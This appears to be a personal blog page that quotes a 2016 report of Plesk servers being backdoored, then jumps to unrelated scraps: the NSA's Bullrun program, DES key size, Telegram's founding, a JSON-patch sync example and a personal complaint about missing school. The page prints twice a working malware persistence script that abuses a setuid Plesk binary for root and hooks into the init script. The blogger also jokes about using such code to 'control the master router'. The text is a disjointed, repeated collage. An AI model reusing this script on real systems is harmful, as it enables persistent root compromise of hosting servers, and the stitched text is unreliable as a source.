Sunday, August 28, 2016
Saturday, August 27, 2016
Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??..I heard a story did u herad the same story?
Attackers, using the bug http://kb.parallels.com/en/112303
were able to get access to PLESK installations and install backdoors in
the systems. I’m using plural on backdoors, cause it’s not just one,
there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe
webpy-php-port /webphp/web.php
https://searchcode.com/codesearch/view/13403593/
Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques
Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.
Then..how to beat NSA as a superpower and become as powerfull as them?
parity check bit
https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650
In an interview with the New York Times, Durov said the idea of the messenger service came to him after Russia's Federal Security Service demanded that he delete opposition communities from his Vkontakte social network. After the demands were refused special service agents tried putting pressure on the programmer and searched his apartment and that of his parents. The entrepreneur then understood that he doesn't have a safe channel for communicating with friends and family, and so he decided to create a secure messaging app.
what do I understand here, is that client and server both agree on replacing the path
Example:
https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization
I just missed school for 3 months!!!! How the hell am I gonna make the semester??? Mu father is gonna kill me!!!
and then...
https://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z
Example:
[
{"op": "replace", "path": "/_AliceVersion", "value": 1},
{"op": "test", "path": "/_BobVersion", "value": 0},
//...
{"op": "replace", "path": "/some/where", "value": "something"}
]
https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization
I just missed school for 3 months!!!! How the hell am I gonna make the semester??? Mu father is gonna kill me!!!
and then...
Full guide on creating stateful Telegram bot
I have a couple of reasons to write this article. First of all I have a repository called ruby-telegram-bot-starter-kit, which contains a boilerplate for creating simple Telegram botshttps://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z
Subscribe to:
Posts (Atom)
